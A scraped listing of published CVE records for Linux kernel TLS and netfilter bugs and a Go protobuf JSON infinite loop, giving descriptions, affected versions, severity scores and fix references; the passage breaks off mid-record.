{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26584", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-26T17:14:36.035758Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:03.401Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.862Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "3ade391adc584f17b5570fd205de3ad029090368", "status": "affected", "version": "a54667f6728c2714a400f3c884727da74b6d1717", "versionType": "git" }, { "lessThan": "cd1bbca03f3c1d845ce274c0d0a66de8e5929f72", "status": "affected", "version": "a54667f6728c2714a400f3c884727da74b6d1717", "versionType": "git" }, { "lessThan": "13eca403876bbea3716e82cdfe6f1e6febb38754", "status": "affected", "version": "a54667f6728c2714a400f3c884727da74b6d1717", "versionType": "git" }, { "lessThan": "ab6397f072e5097f267abf5cb08a8004e6b17694", "status": "affected", "version": "a54667f6728c2714a400f3c884727da74b6d1717", "versionType": "git" }, { "lessThan": "8590541473188741055d27b955db0777569438e3", "status": "affected", "version": "a54667f6728c2714a400f3c884727da74b6d1717", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.16" }, { "lessThan": "4.16", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.160", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.84", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: tls: handle backlogging of crypto requests\n\nSince we\u0027re setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our\nrequests to the crypto API, crypto_aead_{encrypt,decrypt} can return\n -EBUSY instead of -EINPROGRESS in valid situations. For example, when\nthe cryptd queue for AESNI is full (easy to trigger with an\nartificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued\nto the backlog but still processed. In that case, the async callback\nwill also be called twice: first with err == -EINPROGRESS, which it\nseems we can just ignore, then with err == 0.\n\nCompared to Sabrina\u0027s original patch this version uses the new\ntls_*crypt_async_wait() helpers and converts the EBUSY to\nEINPROGRESS to avoid having to modify all the error handling\npaths. The handling is identical." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:42:58.168Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368" }, { "url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72" }, { "url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754" }, { "url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694" }, { "url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3" } ], "title": "net: tls: handle backlogging of crypto requests", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26584", "datePublished": "2024-02-21T14:59:12.452Z", "dateReserved": "2024-02-19T14:20:24.125Z", "dateUpdated": "2024-12-19T08:42:58.168Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52581
Vulnerability from cvelistv5
Published
2024-03-02 21:59
Modified
2024-12-19 08:22
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: fix memleak when more than 255 elements expired
When more than 255 elements expired we're supposed to switch to a new gc
container structure.
This never happens: u8 type will wrap before reaching the boundary
and nft_trans_gc_space() always returns true.
This means we recycle the initial gc container structure and
lose track of the elements that came before.
While at it, don't deref 'gc' after we've passed it to call_rcu.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27 Version: bbdb3b65aa91aa0a32b212f27780b28987f2d94f Version: 448be0774882f95a74fa5eb7519761152add601b Version: d19e8bf3ea4114dd21fc35da21f398203d7f7df1 Version: ea3eb9f2192e4fc33b795673e56c97a21987f868 Version: 5f68718b34a531a556f2f50300ead2862278da26 Version: 5f68718b34a531a556f2f50300ead2862278da26 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52581", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-05T20:19:37.141289Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-07T14:54:23.969Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.164Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/7cf055b43756b10aa2b851c927c940f5ed652125" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/a995a68e8a3b48533e47c856865d109a1f1a9d01" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/09c85f2d21ab6b5acba31a037985b13e8e6565b8" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/ef99506eaf1dc31feff1adfcfd68bc5535a22171" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/7e5d732e6902eb6a37b35480796838a145ae5f07" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/4aea243b6853d06c1d160a9955b759189aa02b14" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/cf5000a7787cbc10341091d37245a42c119d26c5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "include/net/netfilter/nf_tables.h", "net/netfilter/nf_tables_api.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "7cf055b43756b10aa2b851c927c940f5ed652125", "status": "affected", "version": "8da1b048f9a501d3d7d38c188ba09d7d0d5b8c27", "versionType": "git" }, { "lessThan": "a995a68e8a3b48533e47c856865d109a1f1a9d01", "status": "affected", "version": "bbdb3b65aa91aa0a32b212f27780b28987f2d94f", "versionType": "git" }, { "lessThan": "09c85f2d21ab6b5acba31a037985b13e8e6565b8", "status": "affected", "version": "448be0774882f95a74fa5eb7519761152add601b", "versionType": "git" }, { "lessThan": "ef99506eaf1dc31feff1adfcfd68bc5535a22171", "status": "affected", "version": "d19e8bf3ea4114dd21fc35da21f398203d7f7df1", "versionType": "git" }, { "lessThan": "7e5d732e6902eb6a37b35480796838a145ae5f07", "status": "affected", "version": "ea3eb9f2192e4fc33b795673e56c97a21987f868", "versionType": "git" }, { "lessThan": "4aea243b6853d06c1d160a9955b759189aa02b14", "status": "affected", "version": "5f68718b34a531a556f2f50300ead2862278da26", "versionType": "git" }, { "lessThan": "cf5000a7787cbc10341091d37245a42c119d26c5", "status": "affected", "version": "5f68718b34a531a556f2f50300ead2862278da26", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "include/net/netfilter/nf_tables.h", "net/netfilter/nf_tables_api.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "6.5" }, { "lessThan": "6.5", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix memleak when more than 255 elements expired\n\nWhen more than 255 elements expired we\u0027re supposed to switch to a new gc\ncontainer structure.\n\nThis never happens: u8 type will wrap before reaching the boundary\nand nft_trans_gc_space() always returns true.\n\nThis means we recycle the initial gc container structure and\nlose track of the elements that came before.\n\nWhile at it, don\u0027t deref \u0027gc\u0027 after we\u0027ve passed it to call_rcu." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:22:01.432Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/7cf055b43756b10aa2b851c927c940f5ed652125" }, { "url": "https://git.kernel.org/stable/c/a995a68e8a3b48533e47c856865d109a1f1a9d01" }, { "url": "https://git.kernel.org/stable/c/09c85f2d21ab6b5acba31a037985b13e8e6565b8" }, { "url": "https://git.kernel.org/stable/c/ef99506eaf1dc31feff1adfcfd68bc5535a22171" }, { "url": "https://git.kernel.org/stable/c/7e5d732e6902eb6a37b35480796838a145ae5f07" }, { "url": "https://git.kernel.org/stable/c/4aea243b6853d06c1d160a9955b759189aa02b14" }, { "url": "https://git.kernel.org/stable/c/cf5000a7787cbc10341091d37245a42c119d26c5" } ], "title": "netfilter: nf_tables: fix memleak when more than 255 elements expired", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52581", "datePublished": "2024-03-02T21:59:47.856Z", "dateReserved": "2024-03-02T21:55:42.569Z", "dateUpdated": "2024-12-19T08:22:01.432Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6622
Vulnerability from cvelistv5
Published
2023-12-08 17:33
Modified
2024-11-15 15:14
Severity ?
EPSS score ?
Summary
A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6622 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2253632 | issue-tracking, x_refsource_REDHAT | |
https://github.com/torvalds/linux/commit/3701cd390fd731ee7ae8b8006246c8db82c72bea |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.895Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6622" }, { "name": "RHBZ#2253632", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253632" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/3701cd390fd731ee7ae8b8006246c8db82c72bea" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AAOVK2F3ALGKYIQ5IOMAYEC2DGI7BWAW/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G3AGDVE3KBLOOYBPISFDS74R4YAZEDAY/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Xingyuan Mo ((IceSword Lab)) for reporting this issue." } ], "datePublic": "2023-12-08T11:56:00+00:00", "descriptions": [ { "lang": "en", "value": "A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:14:29.743Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6622" }, { "name": "RHBZ#2253632", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253632" }, { "url": "https://github.com/torvalds/linux/commit/3701cd390fd731ee7ae8b8006246c8db82c72bea" } ], "timeline": [ { "lang": "en", "time": "2023-12-08T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-08T11:56:00+00:00", "value": "Made public." } ], "title": "Kernel: null pointer dereference vulnerability in nft_dynset_init()", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is to skip loading the affected module \"netfilter\" onto the system till we have a fix available, this can be done by a blacklist mechanism, this will ensure the driver is not loaded at the boot time.\n~~~\nHow do I blacklist a kernel module to prevent it from loading automatically?\nhttps://access.redhat.com/solutions/41278" } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6622", "datePublished": "2023-12-08T17:33:55.348Z", "dateReserved": "2023-12-08T11:50:45.757Z", "dateUpdated": "2024-11-15T15:14:29.743Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-24786
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-11-07 16:23
Severity ?
EPSS score ?
Summary
The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | google.golang.org/protobuf | google.golang.org/protobuf/encoding/protojson |
Version: 0 ≤ |
||||
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "go", "vendor": "golang", "versions": [ { "lessThan": "1.33.0", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-24786", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-11-07T16:22:27.828054Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-07T16:23:32.865Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T23:28:12.790Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/569356" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2611" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240517-0002/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "google.golang.org/protobuf/encoding/protojson", "product": "google.golang.org/protobuf/encoding/protojson", "programRoutines": [ { "name": "UnmarshalOptions.unmarshal" }, { "name": "Unmarshal" }, { "name": "UnmarshalOptions.Unmarshal" } ], "vendor": "google.golang.org/protobuf", "versions": [ { "lessThan": "1.33.0", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "google.golang.org/protobuf/internal/encoding/json", "product": "google.golang.org/protobuf/internal/encoding/json", "programRoutines": [ { "name": "Decoder.Read" }, { "name": "Decoder.Peek" } ], "vendor": "google.golang.org/protobuf", "versions": [ { "lessThan": "1.33.0", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-1286: Improper Validation of Syntactic Correctness of Input", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:35.299Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/cl/569356" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2611" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" }, { "url": "https://security.netapp.com/advisory/ntap-20240517-0002/" } ], "title": "Infinite loop in JSON unmarshaling in google.golang.org/protobuf" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2024-24786", "datePublished": "2024-03-05T22:22:35.299Z", "dateReserved": "2024-01-30T16:05:14.757Z", "dateUpdated": "2024-11-07T16:23:32.865Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26583
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2024-12-19 08:42
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tls: fix race between async notify and socket close
The submitting thread (one which called recvmsg/sendmsg)
may exit as soon as the async crypto handler calls complete()
so any code past that point risks touching already freed data.
Try to avoid the locking and extra flags altogether.
Have the main thread hold an extra reference, this way
we can depend solely on the atomic ref counter for
synchronization.
Don't futz with reiniting the completion, either, we are now
tightly controlling when completion fires.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c Version: 0cada33241d9de205522e3858b18e506ca5cce2c |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26583", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-22T16:41:40.480459Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:01.043Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.779Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "include/net/tls.h", "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7", "status": "affected", "version": "0cada33241d9de205522e3858b18e506ca5cce2c", "versionType": "git" }, { "lessThan": "7a3ca06d04d589deec81f56229a9a9d62352ce01", "status": "affected", "version": "0cada33241d9de205522e3858b18e506ca5cce2c", "versionType": "git" }, { "lessThan": "86dc27ee36f558fe223dbdfbfcb6856247356f4a", "status": "affected", "version": "0cada33241d9de205522e3858b18e506ca5cce2c", "versionType": "git" }, { "lessThan": "6209319b2efdd8524691187ee99c40637558fa33", "status": "affected", "version": "0cada33241d9de205522e3858b18e506ca5cce2c", "versionType": "git" }, { "lessThan": "aec7961916f3f9e88766e2688992da6980f11b8d", "status": "affected", "version": "0cada33241d9de205522e3858b18e506ca5cce2c", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "include/net/tls.h", "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.7" }, { "lessThan": "5.7", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.160", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix race between async notify and socket close\n\nThe submitting thread 